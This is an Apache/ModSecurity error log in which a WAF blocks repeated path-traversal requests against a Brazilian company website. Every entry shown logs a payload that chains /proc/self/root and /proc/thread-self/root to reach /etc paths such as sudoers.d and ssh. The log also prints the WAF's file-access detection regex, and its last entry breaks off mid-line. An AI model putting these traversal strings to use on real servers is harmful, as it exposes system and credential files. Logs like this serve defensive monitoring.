[Thu Mar 19 04:42:17.520710 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.241.31:48026] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo2f-YZRR_7pZ7nDJbpwAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:18.557819 2026] [:error] [pid 19093:tid 140411574073088] [client 74.7.243.128:38768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo2l_V7PWP6ixUYl6KjAAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:19.851067 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:37160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo2-yqAr6etmhZHNox-AAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:22.307252 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.243.128:37164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo3RkFeYa1D6dYQnC8WwAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:22.327055 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:48032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo3Na6ubjKNq_cu4YPpQAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:24.891620 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:37166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo4OoXxyEfFpUF8f_e0wAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:24.914476 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:48040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo4Na6ubjKNq_cu4YPqwAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:28.548079 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.243.128:37180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo5BkFeYa1D6dYQnC8ZgAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:28.627850 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.241.31:48048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo5AbLMZ6AikZjR9Ur3gAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:29.898878 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:52806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo5cdf6f5d65gmYZRBmwAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:30.986922 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:60118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo5uoXxyEfFpUF8f_e1QAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:33.336041 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.241.31:60128] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo6QbLMZ6AikZjR9Ur4QAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:34.854950 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:52816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo6sdf6f5d65gmYZRBnwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:37.163092 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.243.128:52828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo7QbLMZ6AikZjR9Ur5gAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:38.875775 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.241.31:60134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo7gbLMZ6AikZjR9Ur6AAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:40.158222 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:48686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo8Mdf6f5d65gmYZRBoAAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:42.401436 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:48700] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo8fu8EFLIOrSqIptrywAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:42.402720 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.243.128:52838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo8v-YZRR_7pZ7nDJbuQAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:44.986509 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:47714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo8wkwaGbbGflqUZCDFQAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:48.865910 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:48706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo-AkwaGbbGflqUZCDHwAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:42:48.936838 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.243.128:47728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuo-AbLMZ6AikZjR9Ur6gAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:42:50.186987 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:48812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 